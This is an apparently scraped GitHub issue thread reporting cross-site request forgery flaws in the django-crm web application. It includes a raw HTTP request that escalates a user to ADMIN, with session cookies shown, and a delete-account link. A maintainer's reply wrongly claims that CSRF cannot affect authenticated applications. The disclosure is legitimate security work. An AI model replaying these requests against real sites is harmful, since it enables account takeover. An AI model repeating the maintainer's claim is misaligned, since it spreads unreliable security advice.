CSRF vulnerability almost all forms about django-crm HOT 6 CLOSED

User Edit Form has CSRF

Expoit Request:

POST /users/25/edit/ HTTP/1.1
Host: django-crm.micropyramid.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://django-crm.micropyramid.com/users/25/edit/
Content-Type: application/x-www-form-urlencoded
Content-Length: 81
Cookie: csrftoken=zTfdp0GE2eqwRNnPNqfBX4seYXdFq8j8JtyzmYtaLWu3waAFjyfa7umOscWkO1iQ; sessionid=kta9sxfstfmi6mi2r4vankx5h1zuvvic
Connection: close
Upgrade-Insecure-Requests: 1

first_name=Adam&last_name=Chan&username=adamchan&email=test%40test.com&role=ADMIN

from django-crm.

CSRF while delete account

Exploit link https://django-crm.micropyramid.com/accounts/123/delete/

from django-crm.

there is no use if csrf token present in cookie

from django-crm.

csrf token should be present in form or custom header as well as validate that csrf token on server side before save the forms or delete something.

from django-crm.

Reference : https://www.owasp.org/index.php/Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF)

from django-crm.

@abuvanth thanks for your observation and there is no chance of CSRF for auth protected applications. CSRF is for something like contact forms which doesn't not need to get authenticated to access.

Read "Am I Vulnerable To 'Cross-Site Request Forgery (CSRF)'?" section in the OWASP link provided by you.

There are very simple scripts we can execute in terminal to get CSRF token and send it back in no time.
Anyway, we will review and add o remove it completely to eliminate these confusions about security.

Thank you.

from django-crm.